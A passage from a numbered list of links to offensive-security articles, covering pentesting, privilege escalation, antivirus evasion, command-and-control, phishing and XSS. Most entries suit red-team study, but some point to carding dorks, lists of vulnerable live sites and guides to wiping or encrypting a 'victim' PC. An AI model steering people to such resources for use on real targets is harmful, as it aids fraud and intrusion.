https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ -366-empires-cross-platform-office-macro: https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/ -367-recon tools: https://blackarch.org/recon.html -368-Black Hat 2018 tools list: https://medium.com/p/991fa38901da -369-Application Introspection & Hooking With Frida: https://www.fuzzysecurity.com/tutorials/29.html -370-And I did OSCP!: https://medium.com/p/589babbfea19 -371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests: https://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html -372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals: https://gbhackers.com/threat-intelligence-tools -373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection: https://techincidents.com/penetration-testing-cheat-sheet/ -374-privilege escalation: https://toshellandback.com/category/privilege-escalation/ -375-The Complete List of Windows Post-Exploitation Commands (No Powershell): https://medium.com/p/999b5433b61e -376-The Art of Subdomain Enumeration: https://blog.sweepatic.com/tag/subdomain-enumeration/ -377-The Principles of a Subdomain Takeover: https://blog.sweepatic.com/subdomain-takeover-principles/ -378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!: https://medium.com/p/b250fb40af82 -379-The Solution for Web for Pentester-I: https://medium.com/p/4c21b3ae9673 -380-The Ultimate Penetration Testing Command Cheat Sheet for Linux: https://www.hackingloops.com/command-cheat-sheet-for-linux/ -381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended: https://www.hackingloops.com/hacking-tricks/ -383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology: https://www.hackingloops.com/exploitation-terminology/ -384-How Hackers Kick Victims Off of Wireless Networks: https://www.hackingloops.com/kick-victims-off-of-wireless-networks/ -385-Maintaining Access Part 1: Introduction and Metasploit Example: https://www.hackingloops.com/maintaining-access-metasploit/ -386-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom: https://www.hackingloops.com/msfvenom/ -388-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky: https://www.hackingloops.com/payloads-via-usb-rubber-ducky/ -390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1: https://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/ -391-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -392-Cracking NTLMv1 Handshakes with Crack.sh: http://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/ -393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch: https://medium.com/p/d5e92843e64a -394-VNC Penetration Testing (Port 5901): http://www.hackingarticles.in/vnc-penetration-testing -395-Windows Privilege Escalation: http://www.bhafsec.com/wiki/index.php/Windows_Privilege_Escalation -396-Removing Sender’s IP Address From Email’s Received: From Header: https://www.devside.net/wamp-server/removing-senders-ip-address-from-emails-received-from-header -397-Dump Cleartext Password in Linux PC using MimiPenguin: http://www.hackingarticles.in/dump-cleartext-password-linux-pc-using-mimipenguin -398-Embedded Backdoor with Image using FakeImageExploiter: http://www.hackingarticles.in/embedded-backdoor-image-using-fakeimageexploiter -399-Exploit Command Injection Vulnearbility with Commix and Netcat: http://www.hackingarticles.in/exploit-command-injection-vulnearbility-commix-netcat -400-Exploiting Form Based Sql Injection using Sqlmap: http://www.hackingarticles.in/exploiting-form-based-sql-injection-using-sqlmap -401-Beginner Guide to impacket Tool kit: http://www.hackingarticles.in/beginner-guide-to-impacket-tool-kit -402-Best of Post Exploitation Exploits & Tricks: http://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks -403-Command Injection to Meterpreter using Commix: http://www.hackingarticles.in/command-injection-meterpreter-using-commix -404-Comprehensive Guide to Crunch Tool: http://www.hackingarticles.in/comprehensive-guide-to-crunch-tool -405-Compressive Guide to File Transfer (Post Exploitation): http://www.hackingarticles.in/compressive-guide-to-file-transfer-post-exploitation -406-Crack Wifi Password using Aircrack-Ng (Beginner’s Guide): http://www.hackingarticles.in/crack-wifi-password-using-aircrack-ng -407-How to Detect Meterpreter in Your PC: http://www.hackingarticles.in/detect-meterpreter-pc -408-Easy way to Hack Database using Wizard switch in Sqlmap: http://www.hackingarticles.in/easy-way-hack-database-using-wizard-switch-sqlmap -409-Exploiting the Webserver using Sqlmap and Metasploit (OS-Pwn): http://www.hackingarticles.in/exploiting-webserver-using-sqlmap-metasploit-os-pwn -410-Create SSL Certified Meterpreter Payload using MPM: http://www.hackingarticles.in/exploit-remote-pc-ssl-certified-meterpreter-payload-using-mpm -411-Port forwarding: A practical hands-on guide: https://www.abatchy.com/2017/01/port-forwarding-practical-hands-on-guide -412-Exploit Dev 101: Jumping to Shellcode: https://www.abatchy.com/2017/05/jumping-to-shellcode.html -413-Introduction to Manual Backdooring: https://www.abatchy.com/2017/05/introduction-to-manual-backdooring_24.html -414-Kernel Exploitation: https://www.abatchy.com/2018/01/kernel-exploitation-1 -415-Exploit Dev 101: Bypassing ASLR on Windows: https://www.abatchy.com/2017/06/exploit-dev-101-bypassing-aslr-on.html -416-Shellcode reduction tips (x86): https://www.abatchy.com/2017/04/shellcode-reduction-tips-x86 -417-OSCE Study Plan: https://www.abatchy.com/2017/03/osce-study-plan -418-[DefCamp CTF Qualification 2017] Don't net, kids! (Revexp 400): https://www.abatchy.com/2017/10/defcamp-dotnot -419-DRUPAL 7.X SERVICES MODULE UNSERIALIZE() TO RCE: https://www.ambionics.io/ -420-SQL VULNERABLE WEBSITES LIST 2017 [APPROX 2500 FRESH SQL VULNERABLE SITES]: https://www.cityofhackerz.com/sql-vulnerable-websites-list-2017 -421-Windows IR Live Forensics Cheat Sheet: https://www.cheatography.com/tag/forensics/ -422-windows-kernel-logic-bug-class-access: https://googleprojectzero.blogspot.com/2019/03/windows-kernel-logic-bug-class-access.html -423-injecting-code-into-windows-protected: https://googleprojectzero.blogspot.com/2018/11/injecting-code-into-windows-protected.html -424-USING THE DDE ATTACK WITH POWERSHELL EMPIRE: https://1337red.wordpress.com/using-the-dde-attack-with-powershell-empire -425-Automated Derivative Administrator Search: https://wald0.com/?p=14 -426-A Red Teamer’s Guide to GPOs and OUs: https://wald0.com/?p=179 -427-Pen Testing and Active Directory, Part VI: The Final Case: https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/ -428-Offensive Tools and Techniques: https://www.sec.uno/2017/03/01/offensive-tools-and-techniques/ -429-Three penetration testing tips to out-hack hackers: http://infosechotspot.com/three-penetration-testing-tips-to-out-hack-hackers-betanews/ -430-Introducing BloodHound: https://wald0.com/?p=68 -431-Red + Blue = Purple: http://www.blackhillsinfosec.com/?p=5368 -432-Active Directory Access Control List – Attacks and Defense – Enterprise Mobility and Security Blog: https://blogs.technet.microsoft.com/enterprisemobility/2017/09/18/active-directory-access-control-list-attacks-and-defense/ -433-PrivEsc: Unquoted Service Path: https://www.gracefulsecurity.com/privesc-unquoted-service-path/ -434-PrivEsc: Insecure Service Permissions: https://www.gracefulsecurity.com/privesc-insecure-service-permissions/ -435-PrivEsc: DLL Hijacking: https://www.gracefulsecurity.com/privesc-dll-hijacking/ -436-Android Reverse Engineering 101 – Part 1: http://www.fasteque.com/android-reverse-engineering-101-part-1/ -437-Luckystrike: An Evil Office Document Generator: https://www.shellntel.com/blog/2016/9/13/luckystrike-a-database-backed-evil-macro-generator -438-the-number-one-pentesting-tool-youre-not-using: https://www.shellntel.com/blog/2016/8/3/the-number-one-pentesting-tool-youre-not-using -439-uac-bypass: http://www.securitynewspaper.com/tag/uac-bypass/ -440-XSSer – Automated Framework Tool to Detect and Exploit XSS vulnerabilities: https://gbhackers.com/xsser-automated-framework-detectexploit-report-xss-vulnerabilities -441-Penetration Testing on X11 Server: http://www.hackingarticles.in/penetration-testing-on-x11-server -442-Always Install Elevated: https://pentestlab.blog/2017/02/28/always-install-elevated -443-Scanning for Active Directory Privileges & Privileged Accounts: https://adsecurity.org/?p=3658 -444-Windows Server 2016 Active Directory Features: https://adsecurity.org/?p=3646 -445-powershell: https://adsecurity.org/?tag=powershell -446-PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection: https://adsecurity.org/?p=2921 -447-DerbyCon 6 (2016) Talk – Attacking EvilCorp: Anatomy of a Corporate Hack: https://adsecurity.org/?p=3214 -448-Real-World Example of How Active Directory Can Be Compromised (RSA Conference Presentation): https://adsecurity.org/?p=2085 -449-Advanced ATM Penetration Testing Methods: https://gbhackers.com/advanced-atm-penetration-testing-methods -450-Background: Microsoft Ofice Exploitation: https://rhinosecuritylabs.com/research/abusing-microsoft-word-features-phishing-subdoc/ -451-Automated XSS Finder: https://medium.com/p/4236ed1c6457 -452-Application whitelist bypass using XLL and embedded shellcode: https://rileykidd.com/.../application-whitelist-bypass-using-XLL-and-embedded-shellc -453-AppLocker Bypass – Regsvr32: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32 -454-Nmap Scans using Hex Value of Flags: http://www.hackingarticles.in/nmap-scans-using-hex-value-flags -455-Nmap Scan with Timing Parameters: http://www.hackingarticles.in/nmap-scan-with-timing-parameters -456-OpenSSH User Enumeration Time- Based Attack with Osueta: http://www.hackingarticles.in/openssh-user-enumeration-time-based-attack-osueta -457-Penetration Testing: http://www.hackingarticles.in/web-penetration-testing/ -458-Penetration Testing on Remote Desktop (Port 3389): http://www.hackingarticles.in/penetration-testing-remote-desktop-port-3389 -459-Penetration Testing on Telnet (Port 23): http://www.hackingarticles.in/penetration-testing-telnet-port-23 -460-Penetration Testing in Windows/Active Directory with Crackmapexec: http://www.hackingarticles.in/penetration-testing-windowsactive-directory-crackmapexec -461-Penetration Testing in WordPress Website using WordPress Exploit Framework: http://www.hackingarticles.in/penetration-testing-wordpress-website-using-wordpress-exploit-framework -462-Port Scanning using Metasploit with IPTables: http://www.hackingarticles.in/port-scanning-using-metasploit-iptables -463-Post Exploitation Using WMIC (System Command): http://www.hackingarticles.in/post-exploitation-using-wmic-system-command -464-Privilege Escalation in Linux using etc/passwd file: http://www.hackingarticles.in/privilege-escalation-in-linux-using-etc-passwd-file -465-RDP Pivoting with Metasploit: http://www.hackingarticles.in/rdp-pivoting-metasploit -466-A New Way to Hack Remote PC using Xerosploit and Metasploit: http://www.hackingarticles.in/new-way-hack-remote-pc-using-xerosploit-metasploit -467-Shell to Meterpreter using Session Command: http://www.hackingarticles.in/shell-meterpreter-using-session-command -468-SMTP Pentest Lab Setup in Ubuntu (Port 25): http://www.hackingarticles.in/smtp-pentest-lab-setup-ubuntu -469-SNMP Lab Setup and Penetration Testing: http://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing -470-SQL Injection Exploitation in Multiple Targets using Sqlmap: http://www.hackingarticles.in/sql-injection-exploitation-multiple-targets-using-sqlmap -471-Sql Injection Exploitation with Sqlmap and Burp Suite (Burp CO2 Plugin): http://www.hackingarticles.in/sql-injection-exploitation-sqlmap-burp-suite-burp-co2-plugin -472-SSH Penetration Testing (Port 22): http://www.hackingarticles.in/ssh-penetration-testing-port-22 -473-Manual Post Exploitation on Windows PC (System Command): http://www.hackingarticles.in/manual-post-exploitation-windows-pc-system-command -474-SSH Pivoting using Meterpreter: http://www.hackingarticles.in/ssh-pivoting-using-meterpreter -475-Stealing Windows Credentials of Remote PC with MS Office Document: http://www.hackingarticles.in/stealing-windows-credentials-remote-pc-ms-office-document -476-Telnet Pivoting through Meterpreter: http://www.hackingarticles.in/telnet-pivoting-meterpreter -477-Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin): http://www.hackingarticles.in/hack-password-using-rogue-wi-fi-access-point-attack-wifi-pumpkin -478-Hack Remote PC using Fake Updates Scam with Ettercap and Metasploit: http://www.hackingarticles.in/hack-remote-pc-using-fake-updates-scam-with-ettercap-and-metasploit -479-Hack Remote Windows 10 Password in Plain Text using Wdigest Credential Caching Exploit: http://www.hackingarticles.in/hack-remote-windows-10-password-plain-text-using-wdigest-credential-caching-exploit -480-Hack Remote Windows 10 PC using TheFatRat: http://www.hackingarticles.in/hack-remote-windows-10-pc-using-thefatrat -481-2 Ways to Hack Windows 10 Password Easy Way: http://www.hackingarticles.in/hack-windows-10-password-easy-way -482-How to Change ALL Files Extension in Remote PC (Confuse File Extensions Attack): http://www.hackingarticles.in/how-to-change-all-files-extension-in-remote-pc-confuse-file-extensions-attack -483-How to Delete ALL Files in Remote Windows PC: http://www.hackingarticles.in/how-to-delete-all-files-in-remote-windows-pc-2 -484-How to Encrypt Drive of Remote Victim PC: http://www.hackingarticles.in/how-to-encrypt-drive-of-remote-victim-pc -485-Post Exploitation in Linux With Metasploit: https://pentestlab.blog/2013/01/04/post-exploitation-in-linux-with-metasploit -486-Red Team: https://posts.specterops.io/tagged/red-team?source=post -487-Code Signing Certi cate Cloning Attacks and Defenses: https://posts.specterops.io/tagged/code-signing?source=post -488-Phishing: https://posts.specterops.io/tagged/phishing?source=post -489-PowerPick – A ClickOnce Adjunct: http://www.sixdub.net/?p=555 -490-sql-injection-xss-playground: https://ired.team/offensive-security-experiments/offensive-security-cheetsheets/sql-injection-xss-playground -491-Privilege Escalation & Post-Exploitation: https://github.com/rmusser01/Infosec_Reference/raw/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md -492-https-payload-and-c2-redirectors: https://posts.specterops.io/https-payload-and-c2-redirectors-ff8eb6f87742?source=placement_card_footer_grid---------2-41 -493-a-push-toward-transparency: https://posts.specterops.io/a-push-toward-transparency-c385a0dd1e34?source=placement_card_footer_grid---------0-41 -494-bloodhound: https://posts.specterops.io/tagged/bloodhound?source=post -495-active directory: https://posts.specterops.io/tagged/active-directory?source=post -496-Load & Execute Bundles with migrationTool: https://posts.specterops.io/load-execute-bundles-with-migrationtool-f952e276e1a6?source=placement_card_footer_grid---------1-41 -497-Outlook Forms and Shells: https://sensepost.com/blog/2017/outlook-forms-and-shells/ -498-Tools: https://sensepost.com/blog/tools/ -499-2018 pentesting resources: https://sensepost.com/blog/2018/ -500-network pentest: https://securityonline.info/category/penetration-testing/network-pentest/ -501-[technical] Pen-testing resources: https://medium.com/p/cd01de9036ad -502-Stored XSS on Facebook: https://opnsec.com/2018/03/stored-xss-on-facebook/ -503-vulnerabilities: https://www.brokenbrowser.com/category/vulnerabilities/ -504-Extending BloodHound: Track and Visualize Your Compromise: https://porterhau5.com/.../extending-bloodhound-track-and-visualize-your-compromise -505-so-you-want-to-be-a-web-security-researcher: https://portswigger.net/blog/so-you-want-to-be-a-web-security-researcher -506-BugBounty — AWS S3 added to my “Bucket” list!: https://medium.com/p/f68dd7d0d1ce -507-BugBounty — API keys leakage, Source code disclosure in India’s largest e-commerce health care company: https://medium.com/p/c75967392c7e -508-BugBounty — Exploiting CRLF Injection can lands into a nice bounty: https://medium.com/p/159525a9cb62 -509-BugBounty — How I was able to bypass rewall to get RCE and then went from server shell to get root user account: https://medium.com/p/783f71131b94 -510-BugBounty — “I don’t need your current password to login into youraccount” - How could I completely takeover any user’s account in an online classi ed ads company: https://medium.com/p/e51a945b083d -511-Ping Power — ICMP Tunnel: https://medium.com/bugbountywriteup/ping-power-icmp-tunnel-31e2abb2aaea?source=placement_card_footer_grid---------1-41 -512-hacking: https://www.nextleveltricks.com/hacking/ -513-Top 8 Best YouTube Channels To Learn Ethical Hacking Online !: https://www.nextleveltricks.com/youtube-channels-to-learn-hacking/ -514-Google Dorks List 2018 | Fresh Google Dorks 2018 for SQLi: https://www.nextleveltricks.com/latest-google-dorks-list/ -515-Art of Shellcoding: Basic AES Shellcode Crypter: http://www.nipunjaswal.com/2018/02/shellcode-crypter.html -516-Big List Of Google Dorks Hacking: https://xspiyr.wordpress.com/2012/09/05/big-list-of-google-dorks-hacking/ -517-nmap-cheatsheet: https://bitrot.sh/cheatsheet/09-12-2017-nmap-cheatsheet/ -518-Aws Recon: https://enciphers.com/tag/aws-recon/ -519-Recon: https://enciphers.com/tag/recon/ -520-Subdomain Enumeration: https://enciphers.com/tag/subdomain-enumeration/ -521-Shodan: https://enciphers.com/tag/shodan/ -522-Dump LAPS passwords with ldapsearch: https://malicious.link/post/2017/dump-laps-passwords-with-ldapsearch/ -523-peepdf - PDF Analysis Tool: http://eternal-todo.com/tools/peepdf-pdf-analysis-tool -524-Evilginx 2 - Next Generation of Phishing 2FA Tokens: breakdev.org/evilginx-2-next-generation-of-phishing-2fa-tokens/ -526-Evil XML with two encodings: https://mohemiv.com/all/evil-xml/ -527-create-word-macros-with-powershell: https://4sysops.com/archives/create-word-macros-with-powershell/ -528-Excess XSS A comprehensive tutorial on cross-site scripting: https://excess-xss.com/ -529-Executing Commands and Bypassing AppLocker with PowerShell Diagnostic Scripts: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -530-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -531-Trust Direction: An Enabler for Active Directory Enumeration and Trust Exploitation: https://bohops.com/2017/12/02/trust-direction-an-enabler-for-active-directory-enumeration-and-trust-exploitation/ -532-Abusing DCOM For Yet Another Lateral Movement Technique: https://bohops.com/2018/04/28/abusing-dcom-for-yet-another-lateral-movement-technique/ -533-“Practical recon techniques for bug hunters & pen testers”: https://blog.appsecco.com/practical-recon-techniques-for-bug-hunters-pen-testers-at-levelup-0x02-b72c15641972?source=placement_card_footer_grid---------2-41 -534-Exploiting Node.js deserialization bug for Remote Code Execution: https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/ -535-Exploiting System Shield AntiVirus Arbitrary Write Vulnerability using SeTakeOwnershipPrivilege: http://www.greyhathacker.net/?p=1006 -536-Running Macros via ActiveX Controls: http://www.greyhathacker.net/?p=948 -537-all=BUG+MALWARE+EXPLOITS http://www.greyhathacker.net/?cat=18 -538-“FILELESS” UAC BYPASS USING EVENTVWR.EXE AND: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking -539-BYPASSING UAC ON WINDOWS 10 USING DISK CLEANUP: https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/ -540-A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests: https://enigma0x3.net/2017/11/06/a-look-at-cve-2017-8715-bypassing-cve-2017-0218-using-powershell-module-manifests/ -541-“FILELESS” UAC BYPASS USING SDCLT.EXE: https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe -542-File Upload XSS: https://medium.com/p/83ea55bb9a55 -543-Firebase Databases: https://medium.com/p/f651a7d49045 -544-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac -545-RED-TEAM: https://cybersyndicates.com/tags/red-team/ -546-Egressing Bluecoat with Cobaltstike & Let's Encrypt: https://www.youtube.com/watch?v=cgwfjCmKQwM -547-Veil-Evasion: https://cybersyndicates.com/tags/veil-evasion/ -548-Dangerous Virus For Windows Crashes Everything Hack window Using Virus: http://thelearninghacking.com/create-virus-hack-windows/ -549-Download Google Dorks List 2019: https://medium.com/p/323c8067502c -550-Don’t leak sensitive data via security scanning tools: https://medium.com/p/7d1f715f0486 -551-CRLF Injection Into PHP’s cURL Options: https://medium.com/@tomnomnom/crlf-injection-into-phps-curl-options-e2e0d7cfe545?source=placement_card_footer_grid---------0-60 -552-Open Redirects & Security Done Right!: https://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496?source=placement_card_footer_grid---------2-60 -553-DOM XSS – auth.uber.com: https://stamone-bug-bounty.blogspot.com/2017/10/dom-xss-auth_14.html -554-PowerPoint and Custom Actions: https://cofense.com/powerpoint-and-custom-actions/ -555-exploiting-adobe-coldfusion: https://codewhitesec.blogspot.com/2018/03/exploiting-adobe-coldfusion.html -556-Command and Control – HTTPS: https://pentestlab.blog/2017/10/04/command-and-control-https -557-Command and Control – Images: https://pentestlab.blog/2018/01/02/command-and-control-images -558-Command and Control – JavaScript: https://pentestlab.blog/2018/01/08/command-and-control-javascript -559-XSS-Payloads: https://github.com/Pgaijin66/XSS-Payloads -560-Command and Control – Web Interface: https://pentestlab.blog/2018/01/03/command-and-control-web-interface -561-Command and Control – Website: https://pentestlab.blog/2017/11/14/command-and-control-website -562-Command and Control – WebSocket: https://pentestlab.blog/2017/12/06/command-and-control-websocket -563-atomic-red-team: https://github.com/redcanaryco/atomic-red-team -564-PowerView-3.0-tricks.ps1: https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993 -565-awesome-sec-talks: https://github.com/PaulSec/awesome-sec-talks -566-Awesome-Red-Teaming: https://github.com/yeyintminthuhtut/Awesome-Red-Teaming -567-awesome-php: https://github.com/ziadoz/awesome-php -568-latest-hacks: https://hackercool.com/latest-hacks/ -569-GraphQL NoSQL Injection Through JSON Types: http://www.east5th.co/blog/2017/06/12/graphql-nosql-injection-through-json-types/ -570-Writing .NET Executables for Pentesters: https://www.peew.pw/blog/2017/12/4/writing-net-executables-for-penteters-part-2 -571-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis. https://github.com/secfigo/Awesome-Fuzzing -572-How to Shutdown, Restart, Logoff, and Hibernate Remote Windows PC: http://www.hackingarticles.in/how-to-shutdown-restart-logoff-and-hibernate-remote-windows-pc -572-Injecting Metasploit Payloads into Android Applications – Manually: https://pentestlab.blog/2017/06/26/injecting-metasploit-payloads-into-android-applications-manually -573-Google Dorks For Carding [Huge List] - Part 1: https://hacker-arena.blogspot.com/2014/03/google-dorks-for-carding-huge-list-part.html -574-Google dorks for growth hackers: https://medium.com/p/7f83c8107057 -575-Google Dorks For Carding (HUGE LIST): https://leetpedia.blogspot.com/2013/01/google-dorks-for-carding-huge-list.html -576-BIGGEST SQL Injection Dorks List ~ 20K+ Dorks: https://leetpedia.blogspot.com/2013/05/biggest-sql-injection-dorks-list-20k.html -577-Pastebin Accounts Hacking (Facebook/Paypal/LR/Gmail/Yahoo, etc): https://leetpedia.blogspot.com/2013/01/pastebin-accounts-hacking.html -578-How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!: http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html -579-Hijacking VNC (Enum, Brute, Access and Crack): https://medium.com/p/d3d18a4601cc -580-Linux Post Exploitation Command List: https://github.com/mubix/post-exploitation/wiki -581-List of google dorks for sql injection: https://deadlyhacker.wordpress.com/2013/05/09/list-of-google-dorks-for-sql-injection/ -582-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset -583-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass: https://www.exploit-db.com/download/44888.txt -584-Microsoft Windows CVE-2018-8210 Remote Code Execution Vulnerability: https://www.securityfocus.com/bid/104407 -585-Microsoft Windows Kernel CVE-2018-0982 Local Privilege Escalation Vulnerability: https://www.securityfocus.com/bid/104382 -586-miSafes Mi-Cam Device Hijacking: https://packetstormsecurity.com/files/146504/SA-20180221-0.txt -587-Low-Level Windows API Access From PowerShell: https://www.fuzzysecurity.com/tutorials/24.html -588-Linux Kernel 'mm/hugetlb.c' Local Denial of Service Vulnerability: https://www.securityfocus.com/bid/103316 -589-Lateral Movement – RDP: https://pentestlab.blog/2018/04/24/lateral-movement-rdp/ -590-Snagging creds from locked machines: https://malicious.link/post/2016/snagging-creds-from-locked-machines/ -591-Making a Blind SQL Injection a Little Less Blind: https://medium.com/p/428dcb614ba8 -592-VulnHub — Kioptrix: Level 5: https://medium.com/@bondo.mike/vulnhub-kioptrix-level-5-88ab65146d48?source=placement_card_footer_grid---------1-60 -593-Unauthenticated Account Takeover Through HTTP Leak: https://medium.com/p/33386bb0ba0b -594-Hakluke’s Ultimate OSCP Guide: Part 1 — Is OSCP for you?: https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440?source=placement_card_footer_grid---------2-43 -595-Finding Target-relevant Domain Fronts: https://medium.com/@vysec.private/finding-target-relevant-domain-fronts-7f4ad216c223?source=placement_card_footer_grid---------0-44 -596-Safe Red Team Infrastructure: https://medium.com/@malcomvetter/safe-red-team-infrastructure-c5d6a0f13fac?source=placement_card_footer_grid---------1-60 -597-Cobalt Strike Visualizations: https://medium.com/@001SPARTaN/cobalt-strike-visualizations-e6a6e841e16b?source=placement_card_footer_grid---------2-60 -598-OWASP Top 10 2017 — Web Application Security Risks: https://medium.com/p/31f356491712 -599-XSS-Auditor — the protector of unprotected: https://medium.com/bugbountywriteup/xss-auditor-the-protector-of-unprotected-f900a5e15b7b?source=placement_card_footer_grid---------0-60 -600-Netcat vs Cryptcat – Remote Shell to Control Kali Linux from Windows machine: https://gbhackers.com/netcat-vs-cryptcat -601-Jenkins Servers Infected With Miner.: https://medium.com/p/e370a900ab2e -602-cheat-sheet: http://pentestmonkey.net/category/cheat-sheet -603-Command and Control – Website Keyword: https://pentestlab.blog/2017/09/14/command-and-control-website-keyword/ -604-Command and Control – Twitter: https://pentestlab.blog/2017/09/26/command-and-control-twitter/ -605-Command and Control – Windows COM: https://pentestlab.blog/2017/09/01/command-and-control-windows-com/ -606-Microsoft Office – NTLM Hashes via Frameset: https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/ -607-PHISHING AGAINST PROTECTED VIEW: https://enigma0x3.net/2017/07/13/phishing-against-protected-view/ -608-PHISHING WITH EMPIRE: https://enigma0x3.net/2016/03/15/phishing-with-empire/ -609-Reverse Engineering Android Applications: https://pentestlab.blog/2017/02/06/reverse-engineering-android-applications/ -610-HTML Injection: https://pentestlab.blog/2013/06/26/html-injection/ -611-Meterpreter stage AV/IDS evasion with powershell: https://arno0x0x.wordpress.com/2016/04/13/meterpreter-av-ids-evasion-powershell/ -612-Windows Atomic Tests by ATT&CK Tactic & Technique: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/windows-index.md -613-Windows Active Directory Post Exploitation Cheatsheet: https://medium.com/p/48c2bd70388 -614-Windows 10 UAC Loophole Can Be Used to Infect Systems with Malware: http://news.softpedia.com/news/windows-10-uac-loophole-can-be-used-to-infect-systems-with-malware-513996.shtml -615-How to Bypass Anti-Virus to Run Mimikatz: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/ -616-Userland API Monitoring and Code Injection Detection: https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -617-USE TOR. USE EMPIRE.: http://secureallthethings.blogspot.com/2016/11/use-tor-use-empire.html -617-ADVANCED CROSS SITE SCRIPTING (XSS) CHEAT SHEET: https://www.muhaddis.info/advanced-cross-site-scripting-xss-cheat-sheet/ -618-Empire without PowerShell.exe: https://bneg.io/2017/07/26/empire-without-powershell-exe/ -619-RED TEAM: https://bneg.io/category/red-team/ -620-PDF Tools: https://blog.didierstevens.com/programs/pdf-tools/ -621-DNS Data ex ltration — What is this and How to use? https://blog.fosec.vn/dns-data-exfiltration-what-is-this-and-how-to-use-2f6c69998822 -621-Google Dorks: https://medium.com/p/7cfd432e0cf3 -622-Hacking with JSP Shells: https://blog.netspi.com/hacking-with-jsp-shells/ -623-Malware Analysis: https://github.com/RPISEC/Malware/raw/master/README.md -624-A curated list of Capture The Flag (CTF) frameworks, libraries, resources and softwares.: https://github.com/SandySekharan/CTF-tool -625-Group Policy Preferences: https://pentestlab.blog/2017/03/20/group-policy-preferences -627-CHECKING FOR MALICIOUSNESS IN AC OFORM OBJECTS ON PDF FILES: https://furoner.wordpress.com/2017/11/15/checking-for-maliciousness-in-acroform-objects-on-pdf-files -628-deobfuscation: https://furoner.wordpress.com/tag/deobfuscation/ -629-POWERSHELL EMPIRE STAGERS 1: PHISHING WITH AN OFFICE MACRO AND EVADING AVS: https://fzuckerman.wordpress.com/2016/10/06/powershell-empire-stagers-1-phishing-with-an-office-macro-and-evading-avs/ -630-A COMPREHENSIVE TUTORIAL ON CROSS-SITE SCRIPTING: https://fzuckerman.wordpress.com/2016/10/06/a-comprehensive-tutorial-on-cross-site-scripting/ -631-GCAT – BACKDOOR EM PYTHON: https://fzuckerman.wordpress.com/2016/10/06/gcat-backdoor-em-python/ -632-Latest Carding Dorks List for Sql njection 2019: https://latestechnews.com/carding-dorks/ -633-google docs for credit card: https://latestechnews.com/tag/google-docs-for-credit-card/ -634-How To Scan Multiple Organizations With Shodan and Golang (OSINT): https://medium.com/p/d994ba6a9587 -635-How to Evade Application Whitelisting Using REGSVR32: https://www.blackhillsinfosec.com/evade-application-whitelisting-using-regsvr32/ -636-phishing: https://www.blackhillsinfosec.com/tag/phishing/ -637-Merlin in action: Intro to Merlin: https://asciinema.org/a/ryljo8qNjHz1JFcFDK7wP6e9I -638-IP Cams from around the world: https://medium.com/p/a6f269f56805 -639-Advanced Cross Site Scripting(XSS) Cheat Sheet by Jaydeep Dabhi: https://jaydeepdabhi.wordpress.com/2016/01/12/advanced-cross-site-scriptingxss-cheat-sheet-by-jaydeep-dabhi/ -640-Just how easy it is to do a domain or subdomain take over!?: https://medium.com/p/265d635b43d8 -641-How to Create hidden user in Remote PC: http://www.hackingarticles.in/create-hidden-remote-metaspolit -642-Process Doppelgänging – a new way to impersonate a process: https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/ -643-How to turn a DLL into astandalone EXE: 